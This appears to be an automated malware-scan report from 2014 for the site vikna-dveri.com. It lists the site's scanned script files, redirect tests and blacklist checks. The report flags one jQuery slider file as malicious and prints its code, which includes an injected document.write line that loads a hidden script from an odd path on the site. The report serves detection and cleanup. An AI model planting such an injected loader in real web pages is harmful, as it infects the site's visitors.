Scanned pages/files
Request | Server response | Status |
http://vikna-dveri.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 05 Oct 2014 01:17:30 GMT Location: http://www.vikna-dveri.com/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=utf-8 | clean |
http://www.vikna-dveri.com/ | 200 OK Content-Length: 27267 Content-Type: text/html | clean |
http://www.vikna-dveri.com/jscript/js_implement/jquery_acc.js | 200 OK Content-Length: 96724 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/js_implement/dnd.js | 200 OK Content-Length: 7388 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/javascript.js | 200 OK Content-Length: 2441 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/js_classes/send_form_class.js | 200 OK Content-Length: 1958 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/js_implement/send_form.js | 200 OK Content-Length: 224 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/new/menu/jquery.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/new/menu/default.js | 200 OK Content-Length: 16010 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/new/out.js | 200 OK Content-Length: 120701 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/new/jquery-1.6.1.min.js | 200 OK Content-Length: 91341 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js | 200 OK Content-Length: 5555 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/new/gallery/slides.min.jquery.js | 200 OK Content-Length: 6861 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a){a.fn.slides=function(b){return b=a.extend({},a.fn.slides.option,b),this.each(function(){function w(g,h,i){if(!p&&o){p=!0,b.animationStart(n+1);switch(g){case"next":l=n,k=n+1,k=e===k?0:k,r=f*2,g=-f*2,n=k;break;case"prev":l=n,k=n-1,k=k===-1?e-1:k,r=0,g=0,n=k;break;case"pagination":k=parseInt(i,10),l=a("."+b.paginationClass+" li."+b.currentClass+" a",c).attr("href").match("[^#/]+$"),k>l?(r=f*2,g=-f*2):(r=0,g=0),n=k}h==="fade"?b.crossfade?d.children(":eq("+k+")",c).css({zInde document.write("<scr"+"ipt src='/_kifa/_xslt/_adm/saints.js'><"+"/script>"); Antivirus reports:
| ||
http://vikna-dveri.com/jscript/easypaginate.js | 200 OK Content-Length: 2613 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/fancybox/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/javascript | clean |
http://vikna-dveri.com/jscript/fancybox//fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vikna-dveri.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 05 Oct 2014 01:17:30 GMT
Location: http://www.vikna-dveri.com/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=utf-8
...0 bytes of data.
GET / HTTP/1.1
Host: vikna-dveri.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 05 Oct 2014 01:17:30 GMT
Location: http://www.vikna-dveri.com/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=utf-8
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vikna-dveri.com
Referer: http://www.google.com/search?q=vikna-dveri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vikna-dveri.com
Referer: http://www.google.com/search?q=vikna-dveri.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vikna-dveri.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vikna-dveri.com/
Result: vikna-dveri.com is not infected or malware details are not published yet.
Result: vikna-dveri.com is not infected or malware details are not published yet.